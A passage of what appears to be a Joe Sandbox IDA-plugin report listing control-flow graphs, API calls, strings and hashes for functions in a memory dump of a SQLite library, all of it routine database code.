                                                    • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E878), ref: 61E17DD4
                                                    • sqlite3_config.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E21FFA), ref: 61E17E08
                                                    • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E878), ref: 61E17F50
                                                    • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E878), ref: 61E17F5D
                                                    • sqlite3_malloc.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E878), ref: 61E17FE2
                                                    • sqlite3_config.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E21FFA), ref: 61E18008
                                                    • sqlite3_free.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E878), ref: 61E1802A
                                                    • sqlite3_os_init.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E878), ref: 61E1802F
                                                    • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E878), ref: 61E18103
                                                    • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E878), ref: 61E1810E
                                                    • sqlite3_mutex_free.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E878), ref: 61E1812A
                                                    • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E878), ref: 61E1813F
                                                    • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E878), ref: 61E18153
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_mutex_leave$sqlite3_mutex_enter$sqlite3_config$sqlite3_freesqlite3_mallocsqlite3_mutex_freesqlite3_os_init
                                                    • String ID: sa
                                                    • API String ID: 1590227068-3658032161
                                                    • Opcode ID: f50511680cdd63bc2ebdfd191ed6b6942f2258144978115b265b51410ecbbdd7
                                                    • Instruction ID: ea7971cbe203f9529516d9d6f049fd3ffae9965bebabd814da69a38b5beeeb3e
                                                    • Opcode Fuzzy Hash: f50511680cdd63bc2ebdfd191ed6b6942f2258144978115b265b51410ecbbdd7
                                                    • Instruction Fuzzy Hash: 7E911A70A18E05CFEB808FAAC44575E7AF5BB8B309F24882ED4589B385D779C8C5CB51
                                                    Function 61E3920B Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 258fileCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 459 61e3920b-61e39249 460 61e3924b-61e3925d call 61e38f24 459->460 461 61e39269-61e39276 call 61e177da 459->461 468 61e39263-61e39266 460->468 469 61e3959a-61e395a3 460->469 466 61e39278-61e39288 sqlite3_free 461->466 467 61e3928d-61e39295 461->467 466->469 470 61e392b0-61e392b7 sqlite3_win32_is_nt 467->470 471 61e39297-61e392ae 467->471 468->461 470->471 473 61e392b9-61e392c6 470->473 472 61e392d9-61e392f6 471->472 477 61e392c8-61e392d7 call 61e1768b 472->477 478 61e392f8 472->478 476 61e392fb-61e392fe 473->476 480 61e39300-61e39308 476->480 481 61e3932a 476->481 477->472 483 61e3932c-61e39359 477->483 478->476 482 61e3930a-61e39325 sqlite3_free * 2 480->482 480->483 481->483 482->469 485 61e3935b-61e39366 483->485 486 61e39369-61e3938d 483->486 485->486 487 61e39398-61e393d6 CreateFileW 486->487 488 61e3938f-61e39396 sqlite3_win32_is_nt 486->488 490 61e3943b-61e39451 call 61e26cd5 487->490 491 61e393d8-61e393e5 call 61e1768b 487->491 488->487 489 61e393fb-61e39439 488->489 489->490 497 61e393ec-61e393f9 call 61e1768b 489->497 498 61e39457-61e39494 call 61e2638f sqlite3_free * 2 490->498 499 61e394d9-61e394dd 490->499 491->487 500 61e393e7-61e393ea 491->500 497->489 497->500 511 61e39496-61e3949a 498->511 512 61e394c8-61e394cd call 61e28a17 498->512 503 61e394df-61e394eb 499->503 504 61e394ed-61e39516 sqlite3_free * 2 499->504 500->490 503->504 505 61e3951a-61e39529 504->505 506 61e39518 504->506 509 61e3952b 505->509 510 61e3952f-61e3954c sqlite3_uri_boolean 505->510 506->505 509->510 513 61e39552-61e39597 510->513 514 61e3954e 510->514 511->512 515 61e3949c-61e394c6 call 61e3920b 511->515 518 61e394d2-61e394d4 512->518 513->469 514->513 515->518 518->469
                                                    APIs
                                                    • sqlite3_free.SQLITE3 ref: 61E39283
                                                      • Part of subcall function 61E38F24: sqlite3_free.SQLITE3 ref: 61E38F96
                                                    • sqlite3_win32_is_nt.SQLITE3 ref: 61E392B0
                                                    • sqlite3_free.SQLITE3 ref: 61E39315
                                                    • sqlite3_free.SQLITE3 ref: 61E39320
                                                    • sqlite3_win32_is_nt.SQLITE3 ref: 61E3938F
                                                    • CreateFileW.KERNEL32 ref: 61E393C8
                                                    • sqlite3_free.SQLITE3 ref: 61E39480
                                                    • sqlite3_free.SQLITE3 ref: 61E3948B
                                                      • Part of subcall function 61E1768B: sqlite3_win32_sleep.SQLITE3 ref: 61E176E3
                                                    • sqlite3_free.SQLITE3 ref: 61E394FC
                                                    • sqlite3_free.SQLITE3 ref: 61E39507
                                                    • sqlite3_uri_boolean.SQLITE3 ref: 61E39545
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_free$sqlite3_win32_is_nt$CreateFilesqlite3_uri_booleansqlite3_win32_sleep
                                                    • String ID: winOpen
                                                    • API String ID: 1995518269-2556188131
                                                    • Opcode ID: 1b8fcbb28f5a7d6b79565de4cd3579e2e247341c965f8c6450933e380b61ef31
                                                    • Instruction ID: 53689baeb18e22f38f1226e3f8eaef332e1ed591a63873ad18f414831dffe986
                                                    • Opcode Fuzzy Hash: 1b8fcbb28f5a7d6b79565de4cd3579e2e247341c965f8c6450933e380b61ef31
                                                    • Instruction Fuzzy Hash: 48B1C570A047598BEB10DFA9D58478EBBF0FF89318F208929E899DB380D775D885CB51
                                                    Function 61E5E5F3 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 202COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 520 61e5e5f3-61e5e66a call 61e6bbb1 523 61e5e881-61e5e884 520->523 524 61e5e670-61e5e684 520->524 527 61e5e886-61e5e88e 523->527 528 61e5e890-61e5e897 call 61e0a442 523->528 525 61e5e686-61e5e68a 524->525 526 61e5e69d-61e5e6b0 call 61e1318f 524->526 529 61e5e690-61e5e698 525->529 530 61e5e899-61e5e8a3 525->530 535 61e5e6b2-61e5e6b4 call 61e3d349 526->535 536 61e5e6dc-61e5e6e1 526->536 527->528 527->530 528->530 529->530 540 61e5e6b9-61e5e6c4 535->540 538 61e5e6e4-61e5e6f9 call 61e134f9 536->538 543 61e5e6fb-61e5e708 538->543 540->536 542 61e5e6c6-61e5e6d7 call 61e0be9d call 61e11306 540->542 561 61e5e879-61e5e87c call 61e0ae7f 542->561 545 61e5e72b-61e5e735 543->545 546 61e5e70a-61e5e70e 543->546 550 61e5e73a-61e5e74a 545->550 548 61e5e710-61e5e71a 546->548 549 61e5e71c-61e5e727 546->549 548->550 552 61e5e78f-61e5e79e call 61e11306 549->552 553 61e5e729 549->553 554 61e5e74c-61e5e766 call 61e021f8 call 61e13718 550->554 555 61e5e76b-61e5e77b 550->555 567 61e5e86b-61e5e86f 552->567 553->550 554->555 559 61e5e781-61e5e788 555->559 560 61e5e77d 555->560 562 61e5e7a3-61e5e7a6 559->562 563 61e5e78a 559->563 560->559 561->523 568 61e5e7b2-61e5e82e call 61e2dfee sqlite3_exec call 61e0f637 562->568 569 61e5e7a8-61e5e7ac 562->569 563->552 567->561 571 61e5e871-61e5e874 call 61e42cce 567->571 578 61e5e830-61e5e835 call 61e5e519 568->578 579 61e5e83a-61e5e83e 568->579 569->568 572 61e5e7ae 569->572 571->561 572->568 578->579 581 61e5e840-61e5e84c call 61e13258 579->581 582 61e5e84e-61e5e850 579->582 584 61e5e865-61e5e869 581->584 582->584 585 61e5e852-61e5e863 582->585 584->567 584->585 585->567
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: attached databases must use the same text encoding as main database$b&a$d&a$sqlite_master$sqlite_temp_master$unsupported file format
                                                    • API String ID: 0-3890827734
                                                    • Opcode ID: 9f33a0a7deea58475428160c468323754ebf23689947eb0c0736ffcef58cc0c5
                                                    • Instruction ID: 0ddebd33cc4247b4945e85eb74ad4c8fee94b001f425d445053a39311ac94fce
                                                    • Opcode Fuzzy Hash: 9f33a0a7deea58475428160c468323754ebf23689947eb0c0736ffcef58cc0c5
                                                    • Instruction Fuzzy Hash: 4B9124B4E047488BDB55CFAAC480A8EFBF1AF88318F24C46DD8589B345D736E856CB41
                                                    Function 61E13F07 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 65COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 587 61e13f07-61e13f18 588 61e13f1a-61e13f1d call 61e0fff3 587->588 589 61e13f2d-61e13f42 sqlite3_mutex_enter 587->589 595 61e13f22-61e13f26 588->595 591 61e13f84-61e13f93 sqlite3_mutex_leave 589->591 592 61e13f44-61e13f6d 589->592 593 61e13fd5-61e13fde 591->593 594 61e13f95 591->594 596 61e13f75-61e13f7f call 61e0149c 592->596 597 61e13f6f 592->597 594->588 598 61e13f97-61e13fb4 call 61e017c7 sqlite3_mutex_enter 595->598 599 61e13f28 595->599 596->591 597->596 603 61e13fb6 598->603 604 61e13fbc-61e13fd0 call 61e0149c sqlite3_mutex_leave 598->604 599->593 603->604 604->593
                                                    APIs
                                                    • sqlite3_mutex_enter.SQLITE3(?,?,?,?,-00000001,?,61E14051), ref: 61E13F35
                                                    • sqlite3_mutex_leave.SQLITE3(?,?,?,?,-00000001,?,61E14051), ref: 61E13F8C
                                                    • sqlite3_mutex_enter.SQLITE3(?,?,?,?,-00000001,?,61E14051), ref: 61E13FA9
                                                    • sqlite3_mutex_leave.SQLITE3(?,?,?,?,-00000001,?,61E14051), ref: 61E13FD0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                    • String ID: La
                                                    • API String ID: 1477753154-3337869896
                                                    • Opcode ID: bd3d05b8a36dfb17a24570c75878a39b19ec29d31c865c37e54d81d076e473d9
                                                    • Instruction ID: c36e1626ea23d3cc880b814590b4f86d73eeafdf946a10c1b65b5e7e86c9be42
                                                    • Opcode Fuzzy Hash: bd3d05b8a36dfb17a24570c75878a39b19ec29d31c865c37e54d81d076e473d9
                                                    • Instruction Fuzzy Hash: 52116770A18F418FDB00EFAAC48565977F4FB4A329B24883EE684CB300E730D8D58B52
                                                    Function 61E3D349 Relevance: 7.9, APIs: 4, Strings: 1, Instructions: 423COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 607 61e3d349-61e3d368 call 61e1318f 610 61e3d88b-61e3d88d 607->610 611 61e3d36e-61e3d372 607->611 614 61e3d898-61e3d89a 610->614 612 61e3d374-61e3d378 611->612 613 61e3d37e-61e3d384 611->613 612->613 612->614 615 61e3d392-61e3d396 613->615 616 61e3d386-61e3d38a 613->616 617 61e3d8c3-61e3d8da call 61e0ae7f 614->617 618 61e3d89c-61e3d8a0 614->618 621 61e3d398-61e3d39c 615->621 622 61e3d39e-61e3d3a0 615->622 619 61e3d390 616->619 620 61e3d88f-61e3d894 616->620 618->617 623 61e3d8a2-61e3d8b4 618->623 619->622 620->614 621->622 626 61e3d3a2-61e3d3a7 621->626 622->626 627 61e3d3a9-61e3d3ad 622->627 623->617 628 61e3d8b6-61e3d8ba 623->628 629 61e3d3c6-61e3d3cd 626->629 630 61e3d3d3-61e3d3e7 call 61e02c89 627->630 631 61e3d3af 627->631 628->617 632 61e3d8bc-61e3d8c1 call 61e126fe 628->632 629->614 629->630 639 61e3d896 630->639 640 61e3d3ed-61e3d3fc 630->640 634 61e3d3b2-61e3d3b4 631->634 632->617 634->630 637 61e3d3b6-61e3d3bb 634->637 641 61e3d3c1-61e3d3c4 637->641 642 61e3d3bd-61e3d3bf 637->642 639->614 643 61e3d405-61e3d40a 640->643 644 61e3d3fe-61e3d401 640->644 641->634 642->629 645 61e3d40d-61e3d411 643->645 644->643 646 61e3d417-61e3d422 call 61e3a91a 645->646 647 61e3d669-61e3d66b 645->647 646->647 656 61e3d428-61e3d439 call 61e02ffb 646->656 648 61e3d671-61e3d675 647->648 649 61e3d7bb-61e3d7bd 647->649 648->649 651 61e3d67b-61e3d684 648->651 653 61e3d7c3-61e3d7cd call 61e3c160 649->653 654 61e3d7bf-61e3d7c1 649->654 651->653 655 61e3d68a-61e3d691 651->655 657 61e3d7d0-61e3d7d3 653->657 654->657 655->653 661 61e3d697-61e3d6a8 655->661 668 61e3d43e-61e3d442 656->668 659 61e3d7d5-61e3d7d9 657->659 660 61e3d7fa-61e3d7fc 657->660 659->614 664 61e3d7df-61e3d7ef call 61e056d1 659->664 660->614 665 61e3d802-61e3d809 660->665 666 61e3d6ae-61e3d6b6 661->666 667 61e3d7ac-61e3d7b0 661->667 664->645 688 61e3d7f5 664->688 670 61e3d80b-61e3d812 665->670 671 61e3d829-61e3d83b 665->671 673 61e3d780-61e3d792 call 61e146bc 666->673 674 61e3d6bc-61e3d6c0 666->674 667->654 672 61e3d7b2-61e3d7b9 call 61e3d291 667->672 668->647 675 61e3d448-61e3d462 668->675 670->671 677 61e3d814-61e3d826 670->677 679 61e3d840-61e3d844 671->679 680 61e3d83d 671->680 672->649 694 61e3d7a6-61e3d7a8 673->694 695 61e3d794-61e3d796 673->695 681 61e3d6c2-61e3d6c6 674->681 682 61e3d6f6-61e3d705 674->682 684 61e3d492-61e3d495 675->684 685 61e3d464-61e3d490 memcmp 675->685 677->671 679->617 691 61e3d846-61e3d85a 679->691 680->679 681->682 692 61e3d6c8-61e3d6d8 call 61e146bc 681->692 682->653 689 61e3d70b-61e3d71d call 61e0adbf 682->689 687 61e3d498-61e3d49c 684->687 685->687 696 61e3d4a2-61e3d4bf memcmp 687->696 697 61e3d5ee-61e3d646 687->697 688->614 689->653 715 61e3d723-61e3d745 memcmp 689->715 699 61e3d85f-61e3d86e 691->699 700 61e3d85c 691->700 692->653 710 61e3d6de-61e3d6f2 call 61e0ad9d 692->710 706 61e3d747-61e3d765 694->706 707 61e3d7aa 694->707 695->694 703 61e3d798-61e3d7a4 call 61e1470b 695->703 704 61e3d4c5-61e3d4cc 696->704 705 61e3d64b 696->705 697->645 699->623 701 61e3d870-61e3d87c call 61e39f2b 699->701 700->699 701->614 722 61e3d87e-61e3d889 701->722 703->694 713 61e3d4d3-61e3d4d7 704->713 714 61e3d4ce 704->714 712 61e3d650-61e3d65f call 61e3b8c3 705->712 706->667 707->653 710->682 729 61e3d661-61e3d663 712->729 713->705 720 61e3d4dd 713->720 714->713 715->706 721 61e3d767-61e3d77e call 61e0ae1a 715->721 725 61e3d51b-61e3d53b memcmp 720->725 726 61e3d4df-61e3d4e3 720->726 721->653 722->614 725->705 728 61e3d541-61e3d55c 725->728 726->725 730 61e3d4e5-61e3d4fd call 61e8b1c5 726->730 728->705 732 61e3d562-61e3d56d 728->732 729->645 729->647 730->712 738 61e3d503-61e3d50a 730->738 732->705 734 61e3d573-61e3d582 732->734 736 61e3d5b4-61e3d5bb 734->736 737 61e3d584-61e3d5af call 61e3b8c3 call 61e0af47 call 61e13fdf 734->737 740 61e3d5d3-61e3d5d9 736->740 741 61e3d5bd-61e3d5c3 736->741 737->729 738->725 742 61e3d50c-61e3d516 call 61e3b8c3 738->742 740->705 743 61e3d5db-61e3d5ea 740->743 741->740 745 61e3d5c5-61e3d5d1 call 61e2742d 741->745 742->645 743->697 745->712
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: memcmp$sqlite3_mutex_try
                                                    • String ID: 0
                                                    • API String ID: 2794522359-4108050209
                                                    • Opcode ID: 4717ff3650e177f982f66f3ba2423deeadbbed676552da15c4139b69893f6ff1
                                                    • Instruction ID: 17d54fab5ef80b89f7f5652a32290ba59f1c43a495cfbdf8d1c480cef9c79c48
                                                    • Opcode Fuzzy Hash: 4717ff3650e177f982f66f3ba2423deeadbbed676552da15c4139b69893f6ff1
                                                    • Instruction Fuzzy Hash: 40029B78A092659FEB05CFA8C48079ABBF1BFC9308F64C46DD8499B391D774E885CB40
                                                    Function 61E5EDE5 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 176COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                      • Part of subcall function 61E03E4E: sqlite3_stricmp.SQLITE3 ref: 61E03E7B
                                                      • Part of subcall function 61E03E4E: sqlite3_stricmp.SQLITE3 ref: 61E03E93
                                                    • sqlite3_strnicmp.SQLITE3 ref: 61E5EE71
                                                      • Part of subcall function 61E045BA: sqlite3_stricmp.SQLITE3 ref: 61E045ED
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: sqlite3_stricmp$sqlite3_strnicmp
                                                    • String ID: no such table$no such view
                                                    • API String ID: 2198927396-301769730
                                                    • Opcode ID: f76f66081199647b721c3b4e4274d33d1d3e6cffa078acb2550a8b80e1f71a17
                                                    • Instruction ID: a34a4c93b2242448d851388153ddd16c443ac75ccef722b44547936e6c657af3
                                                    • Opcode Fuzzy Hash: f76f66081199647b721c3b4e4274d33d1d3e6cffa078acb2550a8b80e1f71a17
                                                    • Instruction Fuzzy Hash: FB611674B047469BDB40CFB9D980A4EBBF1AF88348F20C42DE859DB351DB35E8518B91
                                                    Function 61E271B5 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 106fileCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 819 61e271b5-61e271dd 820 61e27227-61e27246 819->820 821 61e271df 819->821 822 61e27249-61e27270 ReadFile 820->822 823 61e271e1-61e271e4 821->823 824 61e271e6-61e271f5 821->824 827 61e27272-61e27285 call 61e26cd5 822->827 828 61e2728b-61e27294 822->828 823->820 823->824 825 61e271f7 824->825 826 61e2720a-61e27224 824->826 829 61e271f9-61e271fb 825->829 830 61e271fd-61e27208 825->830 826->820 832 61e27287-61e27289 827->832 835 61e272ca-61e272d6 827->835 828->827 837 61e27296-61e272a3 call 61e1768b 828->837 829->826 829->830 830->832 836 61e272db-61e272e2 832->836 835->836 837->822 840 61e272a5-61e272c8 call 61e2638f 837->840 840->836
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621662737.0000000061EA5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_13_2_61e00000_find.jbxd
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID: winRead
                                                    • API String ID: 2738559852-2759563040
                                                    • Opcode ID: 4432a46e4340993827fcde6d473bbe746e6a860e0e7c26a22d3ce85d0a2568f6
                                                    • Instruction ID: ff8ccd66139c94f47e8d4ba298fd7cc00fe44d00914d80b6b9d4325a0e5c1f7a
                                                    • Opcode Fuzzy Hash: 4432a46e4340993827fcde6d473bbe746e6a860e0e7c26a22d3ce85d0a2568f6
                                                    • Instruction Fuzzy Hash: AA41E3B2E002599BCF44DFA9D89058EBBF2FF99714F218529F828A7304D730E941CB91
                                                    Function 61E0FFF3 Relevance: 3.1, APIs: 2, Instructions: 78COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 843 61e0fff3-61e10009 844 61e1000f-61e10015 843->844 845 61e100ee 843->845 844->845 846 61e1001b-61e10024 844->846 847 61e100f0-61e100f7 845->847 848 61e100e3-61e100ec 846->848 849 61e1002a-61e10048 sqlite3_mutex_enter 846->849 848->847 852 61e10050-61e1005f 849->852 853 61e1004a 849->853 854 61e10061 852->854 855 61e100a3-61e100a6 call 61e273a9 852->855 853->852 856 61e10063-61e10066 854->856 857 61e10068-61e1007f 854->857 858 61e100ac-61e100b0 855->858 856->855 856->857 859 61e10081 857->859 860 61e10099 857->860 861 61e100d2-61e100e1 sqlite3_mutex_leave 858->861 862 61e100b2-61e100cd call 61e017c7 call 61e0149c * 2 858->862 863 61e10083-61e10086 859->863 864 61e10088-61e10097 call 61e09aba 859->864 860->855 861->847 862->861 863->860 863->864 864->855
                                                    APIs
                                                    • sqlite3_mutex_enter.SQLITE3 ref: 61E10032
                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E100DA
                                                    Memory Dump Source
                                                    • Source File: 0000000D.00000002.621633503.0000000061E01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 61E00000, based on PE: true
                                                    • Associated: 0000000D.00000002.621630750.0000000061E00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621643653.0000000061E8D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621646625.0000000061E8F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621650562.0000000061E9E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621653503.0000000061E9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621656280.0000000061EA1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 0000000D.00000002.621659537.0000000061EA4000.00000008.00000001.01000000.0000000A.sdmpDownload File
